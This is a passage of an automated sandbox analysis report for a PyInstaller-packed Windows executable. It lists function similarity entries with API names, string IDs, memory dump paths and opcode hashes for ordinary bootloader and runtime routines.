                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                • Instruction ID: eb9cdf573561d72e968b8cec72f3b2eed734b80c3b87ff13363cc6bbd7044e6d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC312622B1868152E7109761B8412EB7295BF8D7ECF508132FE8EC3769EF3CD5568240
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                • Instruction ID: 540c09147b8429001ffbd083134ce127f2dd2a70cbf339bbec284565f88280dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95317F72619A8185EB20DB21E8542FA6360FF8D79CF548175EA4EC7B69DF3CD501C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF60B12918F,?,00007FF60B123C55), ref: 00007FF60B122BA0
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF60B122C2A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                • Instruction ID: 2dcc3c6263057e5440c7c58213eb94c5e124b731065e5966260dea364fe587a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB219C62B08B4192E7109B14F8847AA73A4EB8C788F508176EA8ED7669EF3CD615C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF60B121B99), ref: 00007FF60B122760
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                • Instruction ID: 131b8f60ec16af765efb65d7f2aecb25a59663324919b67eef728be59a8b9491
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36219C32A19B8192E620DB50B8817EA7294EB8C788F508171EE8ED3669DF3CD6558740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                • Instruction ID: 9a85294b6a2c51535dfa54019682bb7ebdd3327a4b27d424039318973b320051
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF04F61B1D60681EA108B24A49477A7360AF4DBA9F648275DA6FC61F4DF6CD048C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                • Instruction ID: 5ff1a9f5cd88b48586d0c0b0d969a68c1666c375950eae13d835ef2c7000b609
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0114622D5CA0309FA541175E5A537B1150AF9E3FCE34C6B4EA6FD62FA8F6C6A454100
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B3AF
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B3CE
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B3F6
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B407
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF60B13A5A3,?,?,00000000,00007FF60B13A83E,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13B418
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                • Instruction ID: 1d0f6b056385930b42361bfe3dcdfb95654cc8aa94b0a83347f9367ec35ce8c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2115421F0D64281F994A725565117A52429F4CFB8F78C3B4E97FC66F6FE2CE5424304
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                • Instruction ID: 36a2dbf9f573bd4d15356e2045deeebd6270b2b751cf3a3b09484894ac4350fe
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211A520E0D20781F968A365559157E12428F4DB78F38C7B4E93FDA6F6FD2DB5424211
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                • Instruction ID: b24911c22b4900ebf582755e663774d6f8fc8d263493fc0fafa9f4de96cdfab3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8091D022A0CA4691FB619F24D45177D37A5AB88F98F64C172DA5FC73E6EE3DE8058300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                • Instruction ID: 0902488d0887ccea708beef3ddccf4490d25e1c12ef6be7f03ffcf237645a5a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1818F72E0829385FB655F2981542792BA1AB19F4CF75C0B5CA0FD72A9EF2DE9039301
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                • Instruction ID: 432e41eee28c1c7dfefb1e0d8b3997c35b122b3c7b6bedb07a7e28726ae0d933
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B518F32A196428AEB548B15E444A787391EB49B9CF31C174DA5FC77A8DF7CEC61C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                • Instruction ID: e06bf89ddef418da7c62dfd76f563c805bf56940680b0e28ab1101f7702ce3d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F517632908282C6DB648B21D09436877B0FB5AB9CF248175DA4EC77A5CF7CE962C701
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                • Instruction ID: 2cb2c30bc8dd68f9a1f5ccd48103916d0396964fd84c10f479bde100a39d1374
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F761A333908BC585DB208B15E4403AAB7A0FB8A798F148275EB9D83B65DF7CD5A1CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                • Instruction ID: da9a105a0d45367cfab3a4305eb9cc780789104517137be83e52cdb7780c218d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18219C62B08B4192E7109B14F8847AA73A4EB8C788F508176EA8ED3669EF3CD655C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                • Instruction ID: 5a85b1df11fe8e253296286558eaf74e6d2fafac26fbe74500a00ce1bd222327
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAD1E172B08B4189E710CF75D4402AC37A1FB58B9CB248276DE5EE7BA9EE38D416C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
